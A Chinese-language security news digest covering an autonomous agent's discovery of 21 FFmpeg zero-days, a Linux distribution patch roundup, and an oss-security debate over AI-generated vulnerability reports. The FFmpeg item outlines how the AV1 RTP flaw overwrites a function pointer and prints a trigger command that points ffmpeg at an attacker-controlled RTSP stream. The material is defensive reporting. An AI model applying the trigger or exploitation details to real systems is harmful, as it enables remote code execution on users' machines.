自主安全代理在 FFmpeg 中挖出 21 個零日漏洞,最老缺陷潛伏逾 23 年
DepthFirst Security Research · 2026-06-02
資安研究機構 DepthFirst 於 2026 年 6 月公布針對 FFmpeg 的大規模漏洞研究成果,其自主安全代理(autonomous security agent)在不到 1,000 美元的運算成本下,共識別出 21 個零日漏洞,其中 9 個已獲得 CVE 編號(CVE-2026-39210 至 CVE-2026-39218),其餘 12 個以內部識別碼 DFVULN-116 至 DFVULN-127 追蹤。部分缺陷自 2003 年即存在於程式碼庫中,從未被人工審計所發現。
漏洞機制
21 個漏洞以堆積緩衝區溢位(heap buffer overflow)為大宗,共 14 例,另有堆疊緩衝區溢位(2 例)、整數溢位(2 例)、整數下溢(1 例)與堆積緩衝區下溢(1 例)。受影響元件橫跨 AV1/JPEG/LATM/MPEG-4 等 RTP 解包器(depacketizer)、DASH/CAF/AVI/AVIF 解封裝器(demuxer),以及 yuv4mpegenc、img2enc 編碼器。
其中最嚴重的是 DFVULN-127,位於 libavformat/rtpdec_av1.c 的 av1_handle_packet() 函式。攻擊者僅需透過 RTSP 傳送一個 183 位元組的 RTP 封包,即可觸發 Temporal Delimiter OBU 處理路徑中的記憶體配置與寫入指標不同步問題,最終覆蓋相鄰 AVBuffer.free 函式指標,實現任意程式碼執行(arbitrary code execution)。PoC 利用腳本(exploit.py)與可重現環境(Dockerfile)已公開於 GitHub。
# 觸發方式:攻擊者控制的 RTSP 串流,無需任何認證
ffmpeg -i rtsp://attacker/stream受影響版本
研究報告以 FFmpeg commit d12791ef7ff78e81f7ada42276862976fa1d09a1(2025-10-27)作為驗證基準,缺陷在當前 master 分支同樣存在。以下為部分漏洞的引入年份:
CVE-2026-39214:2003 年引入,存在逾 23 年DFVULN-122:2005 年引入,超過 20 年CVE-2026-39210、CVE-2026-39211:均於 2010 年引入
| 漏洞類型 | 數量 | 代表 ID |
|---|---|---|
| Heap Buffer Overflow | 14 | DFVULN-127、CVE-2026-39210 |
| Stack Buffer Overflow | 2 | CVE-2026-39216 |
| Integer Overflow | 2 | CVE-2026-39218 |
| Integer / Heap Underflow | 2 | DFVULN-119 |
| Stack Overflow | 1 | DFVULN-124 |
修補與緩解
截至報告發佈時,官方修補尚未完全釋出;9 個 CVE 在 NVD 仍顯示 RESERVED 狀態。使用者應避免對不可信的 RTSP 端點執行 ffmpeg -i,尤其是在接受來自外部網路即時串流的應用場景。其餘 12 個漏洞的揭露進度可透過 DepthFirst 研究頁面追蹤。
原始來源:DepthFirst Research — 21 Zero-Days in FFmpeg、GitHub PoC (DFVULN-127)
2026 年 6 月第二週 Linux 發行版安全更新彙整:核心、OpenSSL、Apache 等重點修補
LWN.net Security · 2026-06-12
2026 年 6 月 11 至 12 日,AlmaLinux、Debian、Fedora、Mageia、Red Hat、SUSE 與 Ubuntu 等主流 Linux 發行版集中釋出安全更新。此波更新範圍涵蓋作業系統核心、加密函式庫、網頁伺服器與 DNS 服務,共計超過 70 份獨立公告,顯示多個跨發行版共用元件同時面臨修補需求。
重點漏洞與受影響套件
Ubuntu 針對 Apache HTTP Server 發布公告 USN-8396-1,修補四個 CVE:CVE-2026-24072(mod_rewrite 權限處理不當,可能洩漏敏感資訊)、CVE-2026-28780(mod_proxy_ajp 處理 AJP 訊息錯誤,可能觸發任意程式碼執行)、CVE-2026-29169(mod_dav_lock 記憶體異常,拒絕服務)與 CVE-2026-34059(mod_proxy_ajp 記憶體錯誤,可能造成資訊洩漏)。受影響版本涵蓋 Ubuntu 14.04 至 20.04 LTS,需重啟 Apache2 服務方能套用更新。
Red Hat 針對 RHEL 9.2 SAP 解決方案版本發布 RHSA-2026:25252-01,修補 buildah 容器映像建構工具中多個 Go 語言標準函式庫缺陷,包含 CVE-2025-61729(crypto/x509 憑證解析 DoS)、CVE-2025-61726(net/url 查詢參數記憶體耗盡)、CVE-2025-68121(crypto/tls 非預期 session 恢復)、CVE-2026-25679(IPv6 主機字面量解析錯誤)與 CVE-2026-34986(go-jose JWE 物件解析拒絕服務)。
受影響發行版與套件清單
- AlmaLinux(22 份公告):kernel、kernel-rt、.NET 8.0/9.0/10.0、httpd、mod_http2、bind、unbound、openssl、redis、samba、expat、poppler
- SUSE / openSUSE(31 份公告):nginx、openssh、gnutls、webkit2gtk3、tomcat、strongswan
- Ubuntu(11 份公告):apache2、dotnet 8/9/10、linux-azure、lwip、ironic
- Fedora:kernel、openssl、vaultwarden
- Debian:ironic、neutron、libinput、linux-base
修補建議
此波更新中,加密函式庫(openssl、gnutls)與 DNS 服務(bind、unbound)同時出現在多個發行版的更新清單,屬於跨平台共用上游套件。系統管理員應優先確認核心(kernel)與加密函式庫版本,並依各發行版公告重啟對應服務或系統。Ubuntu 使用者需注意,apache2 更新部分項目需要 Ubuntu Pro 訂閱方可取得。
原始來源:LWN.net — Security updates for Friday、USN-8396-1 Apache HTTP Server
oss-security 維護者拒絕分拆郵件清單提案,改倡規範化主旨行以因應 AI 漏洞報告洪流
oss-security Mailing List (Openwall) · 2026-06-13
資安研究員 David A. Wheeler 於 2026 年 6 月在 oss-security 郵件清單提議新增一個專門收納例行漏洞報告的子清單(oss-security-vulnerability-reports),以防止 AI 工具大量產生的漏洞報告(「AI vulnpocalypse」)淹沒主清單上的重要討論。清單維護者 Solar Designer 於同日回覆,對提案根本方向提出異議,並提出替代方案。
原本的問題
Wheeler 的憂慮在於:隨著 AI 輔助安全工具普及,自動化生成的漏洞報告數量可能急劇增加,使真正值得關注的議題被稀釋。Solar Designer 則以數據說明現況:2026 年 5 月共有 455 則訊息,低於 2014 年 10 月的歷史高峰 485 則,顯示目前尚未出現失控現象。他指出問題核心在於「難以明確區分例行報告與值得注意的漏洞」,分拆清單只是將篩選問題轉移,而非解決。
採用的方法
Solar Designer 提出的替代方案聚焦在訊息組織與主旨行(Subject line)標準化,而非架構層面的調整。他建議各回報者將同一專案的多個漏洞合併為一封公告,並在主旨行開頭固定填入專案名稱、發佈日期與版本號。他以 GPAC/MP4Box 為反面案例:2026 年 6 月共產生 25 封格式不一的訊息,理想狀態下應整合為 2 封;OpenSSL 的重複 Security Advisory 主旨行亦被點名,建議改為 OpenSSL Security Advisory [9th June 2026] 等含有區辨資訊的格式。
實際效果與後續討論
Solar Designer 的立場代表了 oss-security 一貫的去中心化治理哲學:透過社群規範而非基礎架構改動來維持清單品質。AI 輔助漏洞研究的實際影響已非假設——本週 DepthFirst 公布的 FFmpeg 21 個零日漏洞(以約 1,000 美元 AI 運算成本發掘)正是此類新型態報告的具體案例,顯示討論所擔憂的趨勢正在加速發生。郵件清單對規模化 AI 安全研究的治理方式,預計將成為社群持續辯論的焦點。
原始來源:oss-security — Re: Proposal: Add separate oss-security-vulnerability-reports mailing list